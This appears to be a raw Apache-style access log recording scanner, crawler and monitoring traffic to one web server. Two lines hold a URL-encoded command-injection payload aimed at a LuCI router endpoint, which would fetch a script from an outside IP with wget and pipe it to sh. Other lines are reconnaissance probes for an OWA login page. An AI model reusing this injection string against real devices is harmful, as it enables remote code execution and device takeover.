198.235.24.83 - - [03/Sep/2024:20:28:17 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.224.128.59 - - [03/Sep/2024:20:28:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:20:29:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
141.98.11.173 - - [03/Sep/2024:20:29:17 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:20:31:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
51.222.253.2 - - [03/Sep/2024:20:32:04 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.171 - - [03/Sep/2024:20:32:05 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.224.128.59 - - [03/Sep/2024:20:32:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:20:33:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:35:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:37:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:39:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:41:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
219.140.43.101 - - [03/Sep/2024:20:41:41 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.53 Mobile Safari/537.36"
219.140.41.11 - - [03/Sep/2024:20:42:07 +0200] "GET /favicon.ico HTTP/1.1" 404 290 "-" "Python/3.10 aiohttp/3.8.1"
219.140.43.101 - - [03/Sep/2024:20:42:13 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [03/Sep/2024:20:43:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.185.132.192 - - [03/Sep/2024:20:44:44 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:20:45:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:20:45:50 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mobk.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:20:45:50 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:20:47:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:20:48:28 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:20:49:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:20:51:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
